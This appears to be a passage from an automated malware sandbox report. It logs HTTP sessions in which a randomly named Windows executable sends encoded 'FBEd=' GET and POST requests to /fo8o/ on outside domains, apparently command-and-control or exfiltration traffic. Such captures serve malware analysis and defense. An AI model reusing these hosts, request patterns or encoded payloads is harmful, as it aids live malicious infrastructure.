FBEd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq2buWKBwDM84iMRmD3wc00/9fi8bRARUzJCJbEtMMAvSj/dYXdGtIUrjhJZRrZ8EZW2xDAUFIrcJEhT/QX0E4Z1rIb6IinhIpY013fdACp4mtGxgN9CfCDOl6ImyWjg8/RQCfKKPHwXJbI2JpE9U20Q8ju0pnZ69Xym9G0TG/luqx5Z7WUfXAcKdHrjG638+ce+KoFyxoGrr6gTO1GHh2tkjVq0DQ0YheuU3N4namSplWwnYvMSnHT0EdKDzeMDKBBYOK54Cerx97INLvY77RMPkM8a4NqIfJ+LUbPdan5y6nmVg2T15O46SSiICnn9sPdrClkySxPg90+66sxn7el0a2jZuvi1pdjOQsqgIiWprkBJlhEa1NhP2yB+BpMTRyBR18Fzv6WGOTbIuhG+ryJrCevX6+5B/r1EYjdsjOp+DPmOdk1YHdGDiVrQJV743+mru6UZyOrNZMAlB4xX94+kipBN+x7gE/AGt/BI5fENeGD7+o+7v46bRgFMLa/FzFHQVJMIDffsr3Cu1vbi702qE5j31849yt7WeX8INhI/122hG1QkiQ1lKmkuQy+U9qSQy8xT1sgl/ykpBgvmapGq+bgP3mmeu/DplQkwAJ1WQFvrvlWeI8D5VDzCN4MxfuUSAwlFhYiIurNxTr8q273jZtrH0VZMnJzsEXXAaG5eQaZKzUMGJc9y5iEDSl3MbnsHlJh15b6i3+VWpPs6eusNAHYjm6OFT7GyDy1cIMXLBxNbMfz+cgbqe40q5ce394vvMr/Abq0pamNmWrR1h8L5cqzMr82RnP0lI1yTnuOyB2itpRcIFKq7N3fbLfodFTc6fe5ORoigrAuIu7PZl5hncNI3om5lssaqpxybzpy3hJDgf9C+ow+0j2/c9kNSFNVPqU+C1CLLtZEbPSeRu9d8RKNOuFqBAT9RGd3WJHQRIHaGnh5XIKMoQe9NJVvd/g0IeN2 [TRUNCATED]
May 8, 2024 10:51:17.870626926 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:51:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277 server-timing: processing;dur=14 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8a1de755-4b43-4d6a-a07b-7be0a466afd4-1715158277 x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPR7RGy7y0bvam6EnVKHqf1Xt1cFB5B79uPSZxcF4K%2B7HxOfcDKyxBWWzw4llHMJ36NBLAlqjS%2Bk%2BHCrxwN0RBzUDESnB Data Raw: Data Ascii:
May 8, 2024 10:51:17.870637894 CEST	287	IN	Data Raw: 61 65 53 64 33 61 63 42 49 50 30 75 6c 6c 6c 56 38 37 43 44 55 75 59 64 59 49 6e 70 32 45 6e 56 66 6f 64 38 73 72 59 69 61 72 31 65 6b 4c 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 Data Ascii: aeSd3acBIP0ulllV87CDUuYdYInp2EnVfod8srYiar1ekL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=118.999958Server: cloudflareCF-RAY: 880835037e
May 8, 2024 10:51:17.870645046 CEST	1289	IN	Data Raw: 36 62 35 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 e9 6f db 36 14 ff de bf 82 53 31 a0 1b 74 53 96 6c 55 4e d7 a5 dd 01 64 07 d6 01 c3 f6 8d 96 68 8b 8b 2c 6a 14 6d 27 1b f6 bf ef 91 14 65 29 b1 bb 2d 41 6b 1e ef fc bd 83 cf 29 3e 79 f7 c3 ed cf Data Ascii: 6b5Xo6S1tSlUNdh,jm'e)-Ak)>yr(jH[;u%=5=k B2k^rA,-9MC2ZkG--=}H>v@+} _hEEEF{"vUTkwj?x=Sruw'g
May 8, 2024 10:51:17.870656967 CEST	435	IN	Data Raw: ea ec 36 f4 f1 12 18 31 02 2d 78 b5 b0 4c a1 1f c7 20 c1 c8 bb 9b 99 35 df fd e6 e8 44 fc a0 13 70 9a 8a 2f df af be 7c 8f 55 8a 98 2b dd 7a d7 4e 3c 1e a8 c7 e6 77 ce a0 ca f4 74 eb dc 14 81 c2 e1 df 41 02 d7 b3 85 1b 2f d1 ad 5d f9 ab 34 55 f8 Data Ascii: 61-xL 5Dp/\|U+zN<wtA/]4ULb=Xa@'2@wb`0H\|45gQ)1ce~tXK/H\<pLb{\|LU{7sWJ&tdYF#cS_ z
May 8, 2024 10:51:17.870667934 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.10	49743	23.227.38.74	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:21.600831985 CEST	505	OUT	GET /fo8o/?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.donnavariedades.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:51:21.806546926 CEST	1289	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 08 May 2024 08:51:21 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 X-Storefront-Renderer-Rendered: 1 location: https://donnavariedades.com/fo8o?FBEd=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pDU2kX3sntZxTqRpQa59jNJPZojQ7fw==&4h8=YPQX8Tch x-redirect-reason: https_required x-frame-options: DENY content-security-policy: frame-ancestors 'none'; x-shopid: 87850025272 x-shardid: 311 vary: Accept powered-by: Shopify server-timing: processing;dur=11, db;dur=3, asn;desc="212238", edge;desc="SEA", country;desc="US", pageType;desc="404", servedBy;desc="h9bp", requestID;desc="eddbe698-feaa-4bd3-bcc2-dae39c8f1a61-1715158281" x-dc: gcp-us-west1,gcp-us-west1,gcp-us-west1 x-request-id: eddbe698-feaa-4bd3-bcc2-dae39c8f1a61-1715158281 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WodDAblzoa0DTh1YicLTqcIHI5RNLkfuCWkjDglBdLfsFWHVg3HRja54UKhZKPJSukL4cREcFhnoazW9mrn65UoX1RqRs6xxwdvjRCoXpMR4oHmgqJ8OdbpMqJCgdxKrPndxauMnliRZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Serv Data Raw: Data Ascii:
May 8, 2024 10:51:21.806560040 CEST	260	IN	Data Raw: 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 33 39 2e 30 30 30 30 33 34 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e 3a 20 31 3b 20 6d 6f 64 65 3d 62 6c 6f 63 6b 0d 0a 58 2d 43 6f 6e 74 Data Ascii: r-Timing: cfRequestDuration;dur=39.000034X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8808351c8bb57577-SEAalt-svc: h3=":4
May 8, 2024 10:51:21.806575060 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.10	49744	34.111.148.214	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:28.280359983 CEST	758	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6b 38 49 71 59 6a 43 7a 72 6b 6e 71 78 6c 42 78 35 70 5a 6a 48 37 48 51 6f 33 33 56 6e 4e 4a 72 64 76 4c 2b 69 6b 6b 4f 71 77 75 78 48 64 32 43 33 33 31 45 37 55 6c 43 70 79 65 5a 55 37 2f 37 62 31 55 47 42 61 6e 55 50 36 50 66 52 70 71 53 54 70 39 69 47 4a 68 2f 4a 45 41 4f 6f 74 78 50 51 53 71 30 43 62 44 6e 33 4c 32 45 2b 63 6f 35 56 39 67 76 6f 71 6b 79 49 6e 54 43 69 35 73 55 55 30 64 55 73 32 39 38 48 55 79 30 33 4e 46 66 35 44 6f 4e 56 58 53 66 4f 2f 32 5a 57 79 63 69 6a 57 4a 56 31 51 74 39 6c 79 61 38 51 48 51 4c Data Ascii: FBEd=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNVXSfO/2ZWycijWJV1Qt9lya8QHQL
May 8, 2024 10:51:28.584340096 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Wed, 08 May 2024 08:51:28 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.10	49745	34.111.148.214	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:30.975128889 CEST	782	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 47 79 65 42 6c 68 42 33 43 53 6c 6c 63 6e 69 53 71 4d 35 6a 6d 46 51 43 74 2b 66 77 3d 3d Data Ascii: FBEd=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FGyeBlhB3CSllcniSqM5jmFQCt+fw==
May 8, 2024 10:51:31.275866032 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Wed, 08 May 2024 08:51:31 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.10	49746	34.111.148.214	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:33.665349007 CEST	1795	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.660danm.top Origin: http://www.660danm.top Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.660danm.top/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6b 30 57 32 58 33 6f 4b 47 79 6d 41 67 57 78 59 69 6a 2b 67 37 7a 6e 37 5a 6a 64 78 4d 41 4c 49 6f 72 4f 47 53 63 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 78 37 4b 71 50 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 32 [TRUNCATED] Data Ascii: FBEd=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhAMWk0W2X3oKGymAgWxYij+g7zn7ZjdxMALIorOGScDcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+mH0qOacx7KqP6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJAeoVT72CpPcmbFGjxk/HMXjqNO9Go1JFJZIb7C/vqyzzezR78iUGbKriLN/lhtw2Oqzl7bEn4IqLIo6eUN3DX2CkUc0Nu/IFP0H926IRfCkeRmWgiRWvJLSyX9sK7WuuBo2sVqxWRXXCNfSaUNDv+i7R/uLzdCp/Zu/wXFfJuyv7XiqknQvXJwGsEPU6lpIkEQvr6crmt+OVgV6WUzJkZPdDRX88zO1iavYxoxmstihAN1OaDBQAIZ7loBuGXF415e6vEJr8r6ytf9B7MoQBLLZQm4x3e9S+9beMRVIDMKGgsAF69bdtg0em1RNvyRRXy/PjB+YWfq1A6fyG+f5LijMChAD8Sc/TaP32E0uWz9HaTxav804K0n3ScbOwD6nBMjjqA2UL66RzfuMVbYARlSSppQgN0dr6FDGU8WoO6x1077/8XekpGRtbTDF9fHwpa1nUvfgcl16qVlcuvYF9US6ISx+hvdDEQ2qUNrDX0jEuN64s+ZXadNrIHDv2zNRefpYFPkPYJ1zUjDXvPrjtBzh4uTR0gxNq6pDO01lC6TQhQABFoCCC+rzDWc+Y/N57TmWJFzqf2xRcAXiNNqiJ7p7I [TRUNCATED]
May 8, 2024 10:51:33.965671062 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Wed, 08 May 2024 08:51:33 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.10	49747	34.111.148.214	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:36.443835020 CEST	497	OUT	GET /fo8o/?4h8=YPQX8Tch&FBEd=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrIKb5dMy/A4l/RoFCElkJ//A4REmieQ== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.660danm.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:51:36.752778053 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 08 May 2024 08:51:36 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED] Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function ba
